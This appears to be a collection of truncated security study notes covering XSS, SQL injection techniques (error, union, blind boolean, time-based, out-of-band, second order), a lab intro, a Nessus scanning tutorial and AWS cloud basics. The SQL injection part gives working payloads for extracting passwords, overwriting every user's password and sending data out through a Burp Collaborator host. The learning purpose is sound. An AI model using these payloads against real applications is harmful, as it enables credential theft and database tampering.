Cross-site scripting known as XSS is a web vulnerability in which malicious scripts are injected int benign and trusted websites. XSS occur when an attacker send malicious code in any user input fields in a browser to a different end-user. Mechanisms In an XSS attack the attacker inject script in HTML code so you’ll have to know javascript and HTML syntax, wbe uses scripts to control client-side application logic and make the website interactive, for example this script generates Hello! pop-up on the web page: ...

A SQL injection is an attack in which the attacker executes arbitrary SQL commands on an application’s database by supplying malicious input inserted into a SQL statement. This happens when the input used in SQL queries is incorrectly filtered or escaped and can lead to authentication bypass, sensitive data leaks, tampering of the database and RCE in some cases. In-Band (classic) SQL Injection Occurs when the attacker uses the same communication channel to both launch the attack and gather the result of the attack Retrieved data is presented directly in the web page Easier to exploit than other categories of SQLi Error-Based SQLi Error bases SQLi is an in-band SQLi technique that forces the database to generate an error, giving the attacker information upon which to refine their injection www.random.com/app.php?id=' #output #You have an error in your SQL syntax, check the manual that corresponds to your MySQL server version... Union-Based SQLi Is an in-band SQLi technique that leverages the UNION SQL operator to combine the results of two queries into a single result set Input: # retrieving data from another table http://www.random.com/app.php?id=’ UNION SELECT username, password FROM users; -- # update all passwords from a table with POST method http://www.random.com/app.php?new_password="password12345';--" query = UPDATE Users SET Password='password12345';-- WHERE Id = 2; --- The WHERE clause, which specifies the criteria of the rows that should be updated, is commented out in this query. The database would update all rows in the table, and change all of the passwords in the Users table to password12345. The attacker can now log in as anyone by using that password Inferential (Blind) SQL Injection SQLi vuln where there is no actual transfer of data via the webapp Just as dangerous as in-band SQLi Attacker be able to reconstruct the information by sending particular requests and observing the resulting behavior of the DB Server Takes longer to exploit than in-ban sql injection Boolean-based SQLi Uses boolean conditions to return a different result depending on whether the query returns a TRUE or FALSE result. www.random.com/app.php?id=1 select title from product where id=1 #Payload 1 (false) www.random.com/app.php?id=1 and 1=2 select title from product where id=1 and 1=2 #Payload 2 (true) www.random.com/app.php?id=1 and 1=1 select title from product where id=1 and 1=1 User table: Administrator / e3c3889ded99ej29dj9edjdje992 SUBSTRING(a,b,c): function that select a part of a string a: the string, b:the first posicion, c=how many chars #Payload1 www.random.com/app.php?id=1 and SUBSTRING((SELECT Password FROM Users WHERE Username ='Administrator'), 1, 1)='s' #Query select title from product where id=1 and SUBSTRING((SELECT Password FROM Users Where Username='Administrator'),1,1)='s' #result: nothing is returned because is false #Payload 2 www.random.com/app.php?id=1 and SUBSTRING((SELECT Password FROM Users Where Username='Administrator'),1,1)='e' #Query select title from product where id=1 and SUBSTRING((SELECT Password FROM Users WHERE Username='Administrator'),1,1)='e' #result: Returned true, the tile of product id 1 is returned bc "e" is the first character of the hashed pass Time-based Blind SQLi Relies in the database pausing for a specified amount of time, then returning the result, indicating a success SQL query execution Ex: if the first character of the administrator’s hashed pass is an “a”, wait 10 seconds. Out-of-band (OAST) SQLi Consists of triggering an out-of-band network connection to a system that you control Not common, uses variety os protocols (DNS,HTTP) '; exec master..xp_dirtree '//434934839493499.burpcollabolator.net/a'-- Second order SQLi Second order SQLi happens when applications user input gets stored in the database, then retrieved and used unsafely in a SQL query. For example consider an app that register an user by specifying username and password, and the user submit the following request: ...

Lab 1 - SQL injection vulnerability in WHERE clause allowing retrieval of hidden data We need to retrieve hidden data so we search query’s in the web where we can inject some sql injection payloads We can see that the request is filtering the data by category, and we are asked to show the hidden elements, so we assume that there is a parameter that hides the elements. We try the following payload that will show the elements of all categories and we will comment out the rest of the query so that it does not filter by hidden or visible elements: ...

Introduction In this tutorial we will cover vulnerability scanning and vulnerability remediation. These are two of the main steps in the Vulnerability Management Lifecycle. We will be using Nessus Essentials to scan local VMs hosted on VMWare Workstation in order run credentialed scans to discover vulnerabilities, remediate some of the vulnerabilities. EC2 Instance Setup first step is launch an EC2 instance, the recommended requirements are: windows OS basic: t3 medium recommended: t3 xlarge Decrypt your password to login in a RDP session and use this to access your EC2 instance ...

Cloud computing and IAM Types of Cloud Computing Infrastructure as a Service (IaaS) Provide building blocks for cloud IT Provide networking, computers, data storage space Highest level of flexibility Simulate the look from managing physical resources Eg: EC2, EBS, GCP, Digital Ocean, Elastic Load Balancing Platform as a Service (PaaS) Remove the company to manage underlying infrastructure Focus on deployment and management of applications You will define the behavior and environment for your application (code) Eg: Heroku, ECS, Elastic Beanstalk Software as a Service (SaaS) Completed product that is run and managed by the service provider offer services meant to be accessed by end users Eg: Gmail, Outlook, Recognition for ML, Zoom ...